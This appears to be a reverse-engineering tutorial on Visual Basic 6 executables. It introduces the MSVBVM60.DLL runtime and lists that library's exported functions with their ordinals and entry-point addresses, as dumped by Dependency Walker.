Reversing a Visual Basic compiled executable requires some understanding of its native code APIs. These can be found in the language extension DLL. In Visual Basic 6.0, the library used is MSVBVM60.DLL; older versions use MSVBVM50.DLL.
However, with the introduction of the .NET framework, newer versions of Visual Basic compiled programs run through the CLR (Common Language Runtime). Unlike those compiled in VB6, these newer versions can only run as standalone programs if they are bundled in an installer containing the .NET redistributable package.
With this in mind, malware authors would rather choose VB6, since not all Windows users have the .NET framework installed.
The Visual Basic Executable
A Visual Basic program can be compiled in Native or P-code format. The starting code can start from either Form_Load or Sub_Main module. These properties can all be found in the VB Structure. A partial detail about this can be found in Alex Ionescu's paper (http://www.alex-ionescu.com/vb.pdf). You can also use an IDA Pro IDC script to parse the VB executable binary which can be found at http://www.hex-rays.com/products/ida/support/freefiles/vb.idc.
MSVBVM60.DLL
The Visual Basic library is responsible for interpreting the VB p-code back into its native APIs, while its modules communicate with system-wide libraries like KERNEL32.DLL and USER32.DLL.
The exports and symbol outputs are based on this library version:
Here is a list of exported APIs that I grabbed using dependency:
***************************| Module Dependency Tree |***************************
*                                                                              *
* Legend: F  Forwarded Module    ?  Missing Module       6  64-bit Module      *
*         D  Delay Load Module   !  Invalid Module                             *
*         *  Dynamic Module      E  Import/Export Mismatch or Load Failure     *
*         ^  Duplicate Module                                                  *
*                                                                              *
*         O  Ordinal Function    E  Import/Export Error  F  Forwarded Function *
*         C  C Function          R  Called At Least Once *  Dynamic Function   *
*         +  C++ Function                                                      *
*                                                                              *
********************************************************************************
[ ] MSVBVM60.DLL
Import Ordinal Hint Function Entry Point
------ ------------- ------------ ---------------------------------- -----------
Export Ordinal Hint Function Entry Point
------ ------------- ------------ ---------------------------------- -----------
[C ] 100 (0x0064) 60 (0x003C) ThunRTMain 0x000035A4
[C ] 101 (0x0065) 73 (0x0049) VBDllUnRegisterServer 0x00093CBF
[C ] 102 (0x0066) 70 (0x0046) VBDllCanUnloadNow 0x00093A6B
[C ] 103 (0x0067) 72 (0x0048) VBDllRegisterServer 0x00093C37
[C ] 104 (0x0068) 71 (0x0047) VBDllGetClassObject 0x00093AE2
[C ] 105 (0x0069) 69 (0x0045) UserDllMain 0x000938F7
[C ] 106 (0x006A) 13 (0x000D) DllRegisterServer 0x000C6043
[C ] 107 (0x006B) 14 (0x000E) DllUnregisterServer 0x000C6221
[C ] 108 (0x006C) 94 (0x005E) __vbaAryLock 0x000DC6D9
[C ] 109 (0x006D) 102 (0x0066) __vbaBoolErrVar 0x000E1A88
[C ] 110 (0x006E) 296 (0x0128) __vbaRedimVar2 0x000DC3AC
[C ] 111 (0x006F) 314 (0x013A) __vbaStrErrVarCopy 0x000E1A7C
[C ] 112 (0x0070) 368 (0x0170) __vbaVarLateMemCallLd 0x00108D8C
[C ] 113 (0x0071) 369 (0x0171) __vbaVarLateMemCallLdRf 0x00108DA8
[C ] 114 (0x0072) 370 (0x0172) __vbaVarLateMemCallSt 0x00108DE2
[C ] 115 (0x0073) 371 (0x0173) __vbaVarLateMemSt 0x00108DC7
[C ] 116 (0x0074) 372 (0x0174) __vbaVarLateMemStAd 0x00108DFD
[C ] 117 (0x0075) 101 (0x0065) __vbaAryVarVarg 0x001074E4
[C ] 118 (0x0076) 162 (0x00A2) __vbaFpCDblR4 0x0010761B
[C ] 119 (0x0077) 163 (0x00A3) __vbaFpCDblR8 0x0010761B
[C ] 120 (0x0078) 164 (0x00A4) __vbaFpCSngR4 0x00107604
[C ] 121 (0x0079) 165 (0x00A5) __vbaFpCSngR8 0x00107604
[C ] 122 (0x007A) 166 (0x00A6) __vbaFpCmpCy 0x00107632
[C ] 123 (0x007B) 167 (0x00A7) __vbaFpCy 0x001075AF
[C ] 124 (0x007C) 168 (0x00A8) __vbaFpI2 0x00107559
[C ] 125 (0x007D) 169 (0x00A9) __vbaFpI4 0x00107570
[C ] 126 (0x007E) 170 (0x00AA) __vbaFpR4 0x00107587
[C ] 127 (0x007F) 171 (0x00AB) __vbaFpR8 0x0010759B
[C ] 128 (0x0080) 172 (0x00AC) __vbaFpUI1 0x00107534
[C ] 129 (0x0081) 173 (0x00AD) __vbaFreeObj 0x000D9FAF
[C ] 130 (0x0082) 175 (0x00AF) __vbaFreeStr 0x000E6BEC
[C ] 131 (0x0083) 177 (0x00B1) __vbaFreeVar 0x00106831
[C ] 132 (0x0084) 179 (0x00B3) __vbaFreeVarg 0x00106A0A
[C ] 133 (0x0085) 193 (0x00C1) __vbaI2Abs 0x000E4CDA
[C ] 134 (0x0086) 197 (0x00C5) __vbaI2I4 0x000E1A08
[C ] 135 (0x0087) 198 (0x00C6) __vbaI2Sgn 0x000E4D2C
[C ] 136 (0x0088) 201 (0x00C9) __vbaI4Abs 0x000E4D03
[C ] 137 (0x0089) 205 (0x00CD) __vbaI4Sgn 0x000E4D44
[C ] 138 (0x008A) 311 (0x0137) __vbaStrCopy 0x000E6C4A
[C ] 139 (0x008B) 319 (0x013F) __vbaStrMove 0x000E6C30
[C ] 140 (0x008C) 332 (0x014C) __vbaUI1I2 0x000E19DC
[C ] 141 (0x008D) 333 (0x014D) __vbaUI1I4 0x000E19F2
[C ] 142 (0x008E) 334 (0x014E) __vbaUI1Sgn 0x000E4D19
[C ] 143 (0x008F) 351 (0x015F) __vbaVarCopy 0x00106BB8
[C ] 144 (0x0090) 354 (0x0162) __vbaVarDup 0x00106DF6
[C ] 145 (0x0091) 376 (0x0178) __vbaVarMove 0x00106AEE
[C ] 146 (0x0092) 409 (0x0199) __vbaVarVargNofree 0x0010728D
[C ] 147 (0x0093) 411 (0x019B) __vbaVarZero 0x00106EA2
[C ] 148 (0x0094) 414 (0x019E) __vbaVargParmRef 0x001072B1
[C ] 149 (0x0095) 417 (0x01A1) __vbaVargVar 0x001072BE
[C ] 150 (0x0096) 418 (0x01A2) __vbaVargVarCopy 0x00107340
[C ] 151 (0x0097) 419 (0x01A3) __vbaVargVarMove 0x00107330
[C ] 152 (0x0098) 420 (0x01A4) __vbaVargVarRef 0x00107301
[C ] 153 (0x0099) 9 (0x0009) DLLGetDocumentation 0x000C632E
[C ] 154 (0x009A) 10 (0x000A) DllCanUnloadNow 0x0009FCB2
[C ] 155 (0x009B) 12 (0x000C) DllGetClassObject 0x0009FC2D
[C ] 156 (0x009C) 82 (0x0052) _CIatan 0x000F92C0
[C ] 157 (0x009D) 83 (0x0053) _CIcos 0x000F9386
[C ] 158 (0x009E) 84 (0x0054) _CIexp 0x000EDD11
[C ] 159 (0x009F) 85 (0x0055) _CIlog 0x000F942B
[C ] 160 (0x00A0) 86 (0x0056) _CIsin 0x000F94EE
[C ] 161 (0x00A1) 87 (0x0057) _CIsqrt 0x000F9593
[C ] 162 (0x00A2) 88 (0x0058) _CItan 0x000F9644
[C ] 163 (0x00A3) 89 (0x0059) __vbaAptOffset 0x000D686A
[C ] 164 (0x00A4) 91 (0x005B) __vbaAryConstruct2 0x000DC6AE
[C ] 165 (0x00A5) 90 (0x005A) __vbaAryConstruct 0x000DC694
[C ] 166 (0x00A6) 92 (0x005C) __vbaAryCopy 0x000CC20D
[C ] 167 (0x00A7) 93 (0x005D) __vbaAryDestruct 0x000DC1FE
[C ] 168 (0x00A8) 95 (0x005F) __vbaAryMove 0x000CC244
[C ] 169 (0x00A9) 96 (0x0060) __vbaAryRebase1Var 0x000DC083
[C ] 170 (0x00AA) 97 (0x0061) __vbaAryRecCopy 0x000CC27B
[C ] 171 (0x00AB) 98 (0x0062) __vbaAryRecMove 0x000CC2F8
[C ] 172 (0x00AC) 99 (0x0063) __vbaAryUnlock 0x000DC6FC
[C ] 173 (0x00AD) 100 (0x0064) __vbaAryVar 0x00103940
[C ] 174 (0x00AE) 103 (0x0067) __vbaBoolStr 0x000E0FED
[C ] 175 (0x00AF) 104 (0x0068) __vbaBoolVar 0x000E0D73
[C ] 176 (0x00B0) 105 (0x0069) __vbaBoolVarNull 0x00107185
[C ] 177 (0x00B1) 106 (0x006A) __vbaCVarAryUdt 0x000DC146
[C ] 178 (0x00B2) 107 (0x006B) __vbaCastObj 0x00105DED
[C ] 179 (0x00B3) 108 (0x006C) __vbaCastObjVar 0x000DA17B
[C ] 180 (0x00B4) 109 (0x006D) __vbaCheckType 0x000D9609
[C ] 181 (0x00B5) 110 (0x006E) __vbaCheckTypeVar 0x000D9656
[C ] 182 (0x00B6) 111 (0x006F) __vbaChkstk 0x000F62EA
[C ] 183 (0x00B7) 112 (0x0070) __vbaCopyBytes 0x000DA0F3
[C ] 184 (0x00B8) 113 (0x0071) __vbaCopyBytesZero 0x000DA118
[C ] 185 (0x00B9) 114 (0x0072) __vbaCyAbs 0x000E9833
[C ] 186 (0x00BA) 46 (0x002E) ProcCallEngine 0x000FD05D
[C ] 187 (0x00BB) 11 (0x000B) DllFunctionCall 0x0000A0FD
[C ] 188 (0x00BC) 115 (0x0073) __vbaCyAdd 0x000E976A
[C ] 189 (0x00BD) 116 (0x0074) __vbaCyErrVar 0x000E4E36
[C ] 190 (0x00BE) 7 (0x0007) CopyRecord 0x000DB749
[C ] 191 (0x00BF) 117 (0x0075) __vbaCyFix 0x000E96C9
[C ] 192 (0x00C0) 118 (0x0076) __vbaCyForInit 0x00109410
[C ] 193 (0x00C1) 119 (0x0077) __vbaCyForNext 0x00109438
[C ] 194 (0x00C2) 120 (0x0078) __vbaCyI2 0x000E199F
[C ] 195 (0x00C3) 63 (0x003F) TipGetAddressOfPredeclaredInstance 0x000CEA97
[C ] 196 (0x00C4) 121 (0x0079) __vbaCyI4 0x000E19B1
[C ] 197 (0x00C5) 122 (0x007A) __vbaCyInt 0x000E96F9
[C ] 198 (0x00C6) 123 (0x007B) __vbaCyMul 0x000E9794
[C ] 199 (0x00C7) 45 (0x002D) MethCallEngine 0x00103B68
[C ] 200 (0x00C8) 124 (0x007C) __vbaCyMulI2 0x000E9674
[C ] 201 (0x00C9) 125 (0x007D) __vbaCySgn 0x000E4DC7
[C ] 202 (0x00CA) 126 (0x007E) __vbaCyStr 0x000E1189
[C ] 203 (0x00CB) 127 (0x007F) __vbaCySub 0x000E977F
[C ] 204 (0x00CC) 128 (0x0080) __vbaCyUI1 0x000E198D
[C ] 205 (0x00CD) 129 (0x0081) __vbaCyVar 0x000E4E3D
[C ] 206 (0x00CE) 130 (0x0082) __vbaDateR4 0x000E1A1E
[C ] 207 (0x00CF) 131 (0x0083) __vbaDateR8 0x000E1A50
[C ] 208 (0x00D0) 132 (0x0084) __vbaDateStr 0x000E111B
[C ] 209 (0x00D1) 133 (0x0085) __vbaDateVar 0x000E0D16
[C ] 210 (0x00D2) 134 (0x0086) __vbaDerefAry 0x000DC292
[C ] 211 (0x00D3) 135 (0x0087) __vbaDerefAry1 0x000DC254
[C ] 212 (0x00D4) 136 (0x0088) __vbaEnd 0x000CBE88
[C ] 213 (0x00D5) 137 (0x0089) __vbaErase 0x000DC0FD
[C ] 214 (0x00D6) 138 (0x008A) __vbaEraseKeepData 0x000DC117
[C ] 215 (0x00D7) 139 (0x008B) __vbaEraseNoPop 0x000DC1DA
[C ] 216 (0x00D8) 140 (0x008C) __vbaError 0x000CE84E
[C ] 217 (0x00D9) 141 (0x008D) __vbaErrorOverflow 0x000CE867
[C ] 218 (0x00DA) 142 (0x008E) __vbaExceptHandler 0x000E47DF
[C ] 219 (0x00DB) 143 (0x008F) __vbaExitEachAry 0x00106424
[C ] 220 (0x00DC) 66 (0x0042) TipSetOption 0x000CBD77
[C ] 221 (0x00DD) 144 (0x0090) __vbaExitEachColl 0x00106446
[C ] 222 (0x00DE) 145 (0x0091) __vbaExitEachVar 0x00106404
[C ] 223 (0x00DF) 146 (0x0092) __vbaExitProc 0x000E4A48
[C ] 224 (0x00E0) 147 (0x0093) __vbaFPException 0x00107513
[C ] 225 (0x00E1) 148 (0x0094) __vbaFPFix 0x000E9758
[C ] 226 (0x00E2) 149 (0x0095) __vbaFPInt 0x000E9821
[C ] 227 (0x00E3) 68 (0x0044) TipUnloadProject 0x0000CF4C
[C ] 228 (0x00E4) 150 (0x0096) __vbaFailedFriend 0x000CBE92
[C ] 229 (0x00E5) 151 (0x0097) __vbaFileClose 0x000D417D
[C ] 230 (0x00E6) 62 (0x003E) TipCreateInstanceProject2 0x000CE91E
[C ] 231 (0x00E7) 32 (0x0020) EbResetProject 0x0000CA68
[C ] 232 (0x00E8) 25 (0x0019) EbGetHandleOfExecutingProject 0x000CEB1C
[C ] 233 (0x00E9) 152 (0x0098) __vbaFileCloseAll 0x000D4191
[C ] 234 (0x00EA) 153 (0x0099) __vbaFileLock 0x000E6738
[C ] 235 (0x00EB) 154 (0x009A) __vbaFileOpen 0x000D3D10
[C ] 236 (0x00EC) 155 (0x009B) __vbaFileSeek 0x000E54CB
[C ] 237 (0x00ED) 156 (0x009C) __vbaFixstrConstruct 0x000E9618
[C ] 238 (0x00EE) 157 (0x009D) __vbaForEachAry 0x00106294
[C ] 239 (0x00EF) 158 (0x009E) __vbaForEachCollAd 0x00105FB3
[C ] 240 (0x00F0) 159 (0x009F) __vbaForEachCollObj 0x0010606C
[C ] 241 (0x00F1) 160 (0x00A0) __vbaForEachCollVar 0x00105ECE
[C ] 242 (0x00F2) 161 (0x00A1) __vbaForEachVar 0x00106315
[C ] 243 (0x00F3) 174 (0x00AE) __vbaFreeObjList 0x000D9FC3
[C ] 244 (0x00F4) 176 (0x00B0) __vbaFreeStrList 0x000E6C01
[C ] 245 (0x00F5) 178 (0x00B2) __vbaFreeVarList 0x00107262
[C ] 246 (0x00F6) 180 (0x00B4) __vbaGenerateBoundsError 0x000DC410
[C ] 247 (0x00F7) 181 (0x00B5) __vbaGet3 0x000E56DE
[C ] 248 (0x00F8) 182 (0x00B6) __vbaGet4 0x000E5715
[C ] 249 (0x00F9) 183 (0x00B7) __vbaGetFxStr3 0x000E57C2
[C ] 250 (0x00FA) 184 (0x00B8) __vbaGetFxStr4 0x000E57F6
[C ] 251 (0x00FB) 185 (0x00B9) __vbaGetOwner3 0x000E5750
[C ] 252 (0x00FC) 186 (0x00BA) __vbaGetOwner4 0x000E5787
[C ] 253 (0x00FD) 187 (0x00BB) __vbaGosub 0x00103BD6
[C ] 254 (0x00FE) 188 (0x00BC) __vbaGosubFree 0x00103C2A
[C ] 255 (0x00FF) 189 (0x00BD) __vbaGosubReturn 0x00103BFF
[C ] 256 (0x0100) 190 (0x00BE) __vbaHresultCheck 0x000DA266
[C ] 257 (0x0101) 191 (0x00BF) __vbaHresultCheckNonvirt 0x000DA2B9
[C ] 258 (0x0102) 192 (0x00C0) __vbaHresultCheckObj 0x000DA274
[C ] 259 (0x0103) 194 (0x00C2) __vbaI2Cy 0x001075E0
[C ] 260 (0x0104) 195 (0x00C3) __vbaI2ErrVar 0x000E4E1A
[C ] 261 (0x0105) 196 (0x00C4) __vbaI2ForNextCheck 0x001094B0
[C ] 262 (0x0106) 199 (0x00C7) __vbaI2Str 0x000E102D
[C ] 263 (0x0107) 200 (0x00C8) __vbaI2Var 0x000E4E21
[C ] 264 (0x0108) 202 (0x00CA) __vbaI4Cy 0x001075F2
[C ] 265 (0x0109) 33 (0x0021) EbResetProjectNormal 0x0000AD6B
[C ] 266 (0x010A) 67 (0x0043) TipUnloadInstance 0x000CBBF6
[C ] 267 (0x010B) 203 (0x00CB) __vbaI4ErrVar 0x000E4E28
[C ] 268 (0x010C) 29 (0x001D) EbLibraryLoad 0x00003259
[C ] 269 (0x010D) 30 (0x001E) EbLibraryUnload 0x000CCDCF
[C ] 270 (0x010E) 204 (0x00CC) __vbaI4ForNextCheck 0x001094D8
[C ] 271 (0x010F) 31 (0x001F) EbLoadRunTime 0x00008EE2
[C ] 272 (0x0110) 206 (0x00CE) __vbaI4Str 0x000E105E
[C ] 273 (0x0111) 207 (0x00CF) __vbaI4Var 0x000E4E2F
[C ] 274 (0x0112) 22 (0x0016) EbCreateContext 0x000067B7
[C ] 275 (0x0113) 23 (0x0017) EbDestroyContext 0x0000E505
[C ] 276 (0x0114) 34 (0x0022) EbSetContextWorkerThread 0x000067F8
[C ] 277 (0x0115) 208 (0x00D0) __vbaInStr 0x0000A296
[C ] 278 (0x0116) 209 (0x00D1) __vbaInStrB 0x000E74C2
[C ] 279 (0x0117) 210 (0x00D2) __vbaInStrVar 0x000E738D
[C ] 280 (0x0118) 211 (0x00D3) __vbaInStrVarB 0x000E7258
[C ] 281 (0x0119) 212 (0x00D4) __vbaInputFile 0x000D3C58
[C ] 282 (0x011A) 213 (0x00D5) __vbaLateIdCall 0x00108B74
[C ] 283 (0x011B) 214 (0x00D6) __vbaLateIdCallLd 0x00108B25
[C ] 284 (0x011C) 24 (0x0018) EbGetErrorInfo 0x000CC5DE
[C ] 285 (0x011D) 215 (0x00D7) __vbaLateIdCallSt 0x00108B5D
[C ] 286 (0x011E) 216 (0x00D8) __vbaLateIdNamedCall 0x00108C07
[C ] 287 (0x011F) 217 (0x00D9) __vbaLateIdNamedCallLd 0x00108BBF
[C ] 288 (0x0120) 218 (0x00DA) __vbaLateIdNamedCallSt 0x00108BE7
[C ] 289 (0x0121) 219 (0x00DB) __vbaLateIdNamedStAd 0x00108C2B
[C ] 290 (0x0122) 220 (0x00DC) __vbaLateIdSt 0x00108B44
[C ] 291 (0x0123) 221 (0x00DD) __vbaLateIdStAd 0x00108BA6
[C ] 292 (0x0124) 222 (0x00DE) __vbaLateMemCall 0x00108CB8
[C ] 293 (0x0125) 223 (0x00DF) __vbaLateMemCallLd 0x00108C4D
[C ] 294 (0x0126) 224 (0x00E0) __vbaLateMemCallSt 0x00108C98
[C ] 295 (0x0127) 225 (0x00E1) __vbaLateMemNamedCall 0x00108D46
[C ] 296 (0x0128) 226 (0x00E2) __vbaLateMemNamedCallLd 0x00108CFE
[C ] 297 (0x0129) 227 (0x00E3) __vbaLateMemNamedCallSt 0x00108D26
[C ] 298 (0x012A) 28 (0x001C) EbIsProjectOnStack 0x0000CA4B
[C ] 299 (0x012B) 61 (0x003D) TipCreateInstanceEx 0x000CBC56
[C ] 300 (0x012C) 36 (0x0024) GetMem2 0x000F5E10
[C ] 301 (0x012D) 37 (0x0025) GetMem4 0x000F5E23
[C ] 302 (0x012E) 38 (0x0026) GetMem8 0x000F5E34
[C ] 303 (0x012F) 42 (0x002A) GetMemStr 0x000F5E66
[C ] 304 (0x0130) 43 (0x002B) GetMemVar 0x000F5EA0
[C ] 305 (0x0131) 41 (0x0029) GetMemObj 0x000F5E4B
[C ] 306 (0x0132) 48 (0x0030) PutMem2 0x000F5F49
[C ] 307 (0x0133) 49 (0x0031) PutMem4 0x000F5F5A
[C ] 308 (0x0134) 50 (0x0032) PutMem8 0x000F5F69
[C ] 309 (0x0135) 54 (0x0036) PutMemStr 0x000F604F
[C ] 310 (0x0136) 55 (0x0037) PutMemVar 0x000F6096
[C ] 311 (0x0137) 53 (0x0035) PutMemObj 0x000F5F7F
[C ] 312 (0x0138) 59 (0x003B) SetMemVar 0x000F61D8
[C ] 313 (0x0139) 58 (0x003A) SetMemObj 0x000F61B1
[C ] 314 (0x013A) 40 (0x0028) GetMemNewObj 0x000F5EBF
[C ] 315 (0x013B) 52 (0x0034) PutMemNewObj 0x000F6149
[C ] 316 (0x013C) 57 (0x0039) SetMemNewObj 0x000F6266
[C ] 317 (0x013D) 35 (0x0023) GetMem1 0x000F5DFF
[C ] 318 (0x013E) 47 (0x002F) PutMem1 0x000F5F3A
[C ] 319 (0x013F) 39 (0x0027) GetMemEvent 0x000F5F1F
[C ] 320 (0x0140) 51 (0x0033) PutMemEvent 0x000F61A1
[C ] 321 (0x0141) 56 (0x0038) SetMemEvent 0x000F6276
[C ] 322 (0x0142) 228 (0x00E4) __vbaLateMemNamedStAd 0x00108D6A
[C ] 323 (0x0143) 229 (0x00E5) __vbaLateMemSt 0x00108C75
[C ] 324 (0x0144) 230 (0x00E6) __vbaLateMemStAd 0x00108CDC
[C ] 325 (0x0145) 231 (0x00E7) __vbaLbound 0x000DC628
[C ] 326 (0x0146) 232 (0x00E8) __vbaLdZeroAry 0x00103988
[C ] 327 (0x0147) 233 (0x00E9) __vbaLenBstr 0x000E6A9B
[C ] 328 (0x0148) 234 (0x00EA) __vbaLenBstrB 0x000E6C7F
[C ] 329 (0x0149) 235 (0x00EB) __vbaLenVar 0x000E6AAB
[C ] 330 (0x014A) 236 (0x00EC) __vbaLenVarB 0x000E6B1A
[C ] 331 (0x014B) 237 (0x00ED) __vbaLineInputStr 0x000D2EC9
[C ] 332 (0x014C) 238 (0x00EE) __vbaLineInputVar 0x000D2FA3
[C ] 333 (0x014D) 239 (0x00EF) __vbaLsetFixstr 0x000E76E5
[C ] 334 (0x014E) 240 (0x00F0) __vbaLsetFixstrFree 0x000E77F3
[C ] 335 (0x014F) 241 (0x00F1) __vbaMidStmtBstr 0x000E7C22
[C ] 336 (0x0150) 242 (0x00F2) __vbaMidStmtBstrB 0x000E7CF4
[C ] 337 (0x0151) 243 (0x00F3) __vbaMidStmtVar 0x000E7C4C
[C ] 338 (0x0152) 244 (0x00F4) __vbaMidStmtVarB 0x000E7C73
[C ] 339 (0x0153) 245 (0x00F5) __vbaNameFile 0x000D6402
[C ] 340 (0x0154) 247 (0x00F7) __vbaNew2 0x000DA237
[C ] 341 (0x0155) 246 (0x00F6) __vbaNew 0x000DA204
[C ] 342 (0x0156) 248 (0x00F8) __vbaNextEachAry 0x00106119
[C ] 343 (0x0157) 249 (0x00F9) __vbaNextEachCollAd 0x00106011
[C ] 344 (0x0158) 250 (0x00FA) __vbaNextEachCollObj 0x001060C4
[C ] 345 (0x0159) 251 (0x00FB) __vbaNextEachCollVar 0x00105F13
[C ] 346 (0x015A) 252 (0x00FC) __vbaNextEachVar 0x001063BC
[C ] 347 (0x015B) 253 (0x00FD) __vbaObjAddref 0x000D9F9A
[C ] 348 (0x015C) 254 (0x00FE) __vbaObjIs 0x000D96C8
[C ] 349 (0x015D) 255 (0x00FF) __vbaObjSet 0x000D9FF1
[C ] 350 (0x015E) 256 (0x0100) __vbaObjSetAddref 0x000DA008
[C ] 351 (0x015F) 257 (0x0101) __vbaObjVar 0x000DA1A9
[C ] 352 (0x0160) 258 (0x0102) __vbaOnError 0x000E499D
[C ] 353 (0x0161) 259 (0x0103) __vbaOnGoCheck 0x000CC357
[C ] 354 (0x0162) 260 (0x0104) __vbaPowerR8 0x000E11CA
[C ] 355 (0x0163) 261 (0x0105) __vbaPrintFile 0x000D50A3
[C ] 356 (0x0164) 262 (0x0106) __vbaPrintObj 0x000D5041
[C ] 357 (0x0165) 263 (0x0107) __vbaPut3 0x000E56FA
[C ] 358 (0x0166) 264 (0x0108) __vbaPut4 0x000E5733
[C ] 359 (0x0167) 265 (0x0109) __vbaPutFxStr3 0x000E57DC
[C ] 360 (0x0168) 266 (0x010A) __vbaPutFxStr4 0x000E5812
[C ] 361 (0x0169) 267 (0x010B) __vbaPutOwner3 0x000E576C
[C ] 362 (0x016A) 268 (0x010C) __vbaPutOwner4 0x000E57A5
[C ] 363 (0x016B) 269 (0x010D) __vbaR4Cy 0x000E19C2
[C ] 364 (0x016C) 270 (0x010E) __vbaR4ErrVar 0x000E4E44
[C ] 365 (0x016D) 271 (0x010F) __vbaR4ForNextCheck 0x001094FC
[C ] 366 (0x016E) 272 (0x0110) __vbaR4Sgn 0x000E4D59
[C ] 367 (0x016F) 273 (0x0111) __vbaR4Str 0x000E10BA
[C ] 368 (0x0170) 274 (0x0112) __vbaR4Var 0x000E4E52
[C ] 369 (0x0171) 275 (0x0113) __vbaR8Cy 0x000E19CF
[C ] 370 (0x0172) 276 (0x0114) __vbaR8ErrVar 0x000E4E4B
[C ] 371 (0x0173) 277 (0x0115) __vbaR8FixI2 0x000E97C5
[C ] 372 (0x0174) 278 (0x0116) __vbaR8FixI4 0x000E97DC
[C ] 373 (0x0175) 279 (0x0117) __vbaR8ForNextCheck 0x00109530
[C ] 374 (0x0176) 280 (0x0118) __vbaR8IntI2 0x000E97F3
[C ] 375 (0x0177) 281 (0x0119) __vbaR8IntI4 0x000E980A
[C ] 376 (0x0178) 282 (0x011A) __vbaR8Sgn 0x000E4D90
[C ] 377 (0x0179) 283 (0x011B) __vbaR8Str 0x000E10EA
[C ] 378 (0x017A) 284 (0x011C) __vbaR8Var 0x000E4E59
[C ] 379 (0x017B) 285 (0x011D) __vbaRaiseEvent 0x00108B8F
[C ] 380 (0x017C) 286 (0x011E) __vbaRecAnsiToUni 0x000DB797
[C ] 381 (0x017D) 287 (0x011F) __vbaRecAssign 0x000DB721
[C ] 382 (0x017E) 288 (0x0120) __vbaRecDestruct 0x000DB704
[C ] 383 (0x017F) 289 (0x0121) __vbaRecDestructAnsi 0x000DB7D1
[C ] 384 (0x0180) 290 (0x0122) __vbaRecUniToAnsi 0x000DB75D
[C ] 385 (0x0181) 291 (0x0123) __vbaRedim 0x000DC30A
[C ] 386 (0x0182) 292 (0x0124) __vbaRedimPreserve 0x000DC339
[C ] 387 (0x0183) 293 (0x0125) __vbaRedimPreserveVar 0x000DC38A
[C ] 388 (0x0184) 294 (0x0126) __vbaRedimPreserveVar2 0x000DC3DE
[C ] 389 (0x0185) 295 (0x0127) __vbaRedimVar 0x000DC368
[C ] 390 (0x0186) 297 (0x0129) __vbaRefVarAry 0x000DC417
[C ] 391 (0x0187) 298 (0x012A) __vbaResume 0x000E49E1
[C ] 392 (0x0188) 299 (0x012B) __vbaRsetFixstr 0x000E78F9
[C ] 393 (0x0189) 300 (0x012C) __vbaRsetFixstrFree 0x000E7A06
[C ] 394 (0x018A) 301 (0x012D) __vbaSetSystemError 0x000CC33A
[C ] 395 (0x018B) 302 (0x012E) __vbaStopExe 0x000CBE4A
[C ] 396 (0x018C) 303 (0x012F) __vbaStr2Vec 0x00103A40
[C ] 397 (0x018D) 304 (0x0130) __vbaStrAryToAnsi 0x000CC0E0
[C ] 398 (0x018E) 305 (0x0131) __vbaStrAryToUnicode 0x000CC0F6
[C ] 399 (0x018F) 306 (0x0132) __vbaStrBool 0x000E0493
[C ] 400 (0x0190) 20 (0x0014) EVENT_SINK_QueryInterface 0x000C9A85
[C ] 401 (0x0191) 17 (0x0011) EVENT_SINK_AddRef 0x000C9B74
[C ] 402 (0x0192) 21 (0x0015) EVENT_SINK_Release 0x000C9B87
[C ] 403 (0x0193) 18 (0x0012) EVENT_SINK_GetIDsOfNames 0x000C9BBE
[C ] 404 (0x0194) 19 (0x0013) EVENT_SINK_Invoke 0x000C9BDC
[C ] 405 (0x0195) 307 (0x0133) __vbaStrCat 0x000E6A76
[C ] 406 (0x0196) 308 (0x0134) __vbaStrCmp 0x000E9596
[C ] 407 (0x0197) 309 (0x0135) __vbaStrComp 0x000E7BE9
[C ] 408 (0x0198) 310 (0x0136) __vbaStrCompVar 0x000E7B3E
[C ] 409 (0x0199) 312 (0x0138) __vbaStrCy 0x000E0613
[C ] 410 (0x019A) 3 (0x0003) BASIC_CLASS_QueryInterface 0x00006C74
[C ] 411 (0x019B) 0 (0x0000) BASIC_CLASS_AddRef 0x00006C40
[C ] 412 (0x019C) 4 (0x0004) BASIC_CLASS_Release 0x0000EA59
[C ] 413 (0x019D) 1 (0x0001) BASIC_CLASS_GetIDsOfNames 0x000CA0B3
[C ] 414 (0x019E) 2 (0x0002) BASIC_CLASS_Invoke 0x000CA14F
[C ] 415 (0x019F) 313 (0x0139) __vbaStrDate 0x000E05D0
[C ] 416 (0x01A0) 315 (0x013B) __vbaStrFixstr 0x000E9652
[C ] 417 (0x01A1) 316 (0x013C) __vbaStrI2 0x000E0507
[C ] 418 (0x01A2) 317 (0x013D) __vbaStrI4 0x000E0537
[C ] 419 (0x01A3) 318 (0x013E) __vbaStrLike 0x000E95BA
[C ] 420 (0x01A4) 5 (0x0005) BASIC_DISPINTERFACE_GetTICount 0x000DE895
[C ] 421 (0x01A5) 6 (0x0006) BASIC_DISPINTERFACE_GetTypeInfo 0x000C97D1
[C ] 422 (0x01A6) 320 (0x0140) __vbaStrR4 0x000E0567
[C ] 423 (0x01A7) 321 (0x0141) __vbaStrR8 0x000E059B
[C ] 424 (0x01A8) 322 (0x0142) __vbaStrTextCmp 0x000E95A8
[C ] 425 (0x01A9) 323 (0x0143) __vbaStrTextLike 0x000E95CF
[C ] 426 (0x01AA) 324 (0x0144) __vbaStrToAnsi 0x0000A3D7
[C ] 427 (0x01AB) 325 (0x0145) __vbaStrToUnicode 0x000CBF1D
[C ] 428 (0x01AC) 326 (0x0146) __vbaStrUI1 0x000E04D4
[C ] 429 (0x01AD) 327 (0x0147) __vbaStrVarCopy 0x000E0646
[C ] 430 (0x01AE) 80 (0x0050) Zombie_QueryInterface 0x000CB279
[C ] 431 (0x01AF) 75 (0x004B) Zombie_AddRef 0x00006C40
[C ] 432 (0x01B0) 81 (0x0051) Zombie_Release 0x0000EA59
[C ] 433 (0x01B1) 78 (0x004E) Zombie_GetTypeInfoCount 0x000CB261
[C ] 434 (0x01B2) 77 (0x004D) Zombie_GetTypeInfo 0x000CB259
[C ] 435 (0x01B3) 76 (0x004C) Zombie_GetIDsOfNames 0x000CB269
[C ] 436 (0x01B4) 79 (0x004F) Zombie_Invoke 0x000CB271
[C ] 437 (0x01B5) 328 (0x0148) __vbaStrVarMove 0x000E1929
[C ] 438 (0x01B6) 329 (0x0149) __vbaStrVarVal 0x000E1948
[C ] 439 (0x01B7) 330 (0x014A) __vbaUI1Cy 0x001075CE
[C ] 440 (0x01B8) 15 (0x000F) EVENT_SINK2_AddRef 0x000C9B9A
[C ] 441 (0x01B9) 16 (0x0010) EVENT_SINK2_Release 0x000C9BAC
[C ] 442 (0x01BA) 331 (0x014B) __vbaUI1ErrVar 0x000E4DFD
[C ] 443 (0x01BB) 335 (0x014F) __vbaUI1Str 0x000E196D
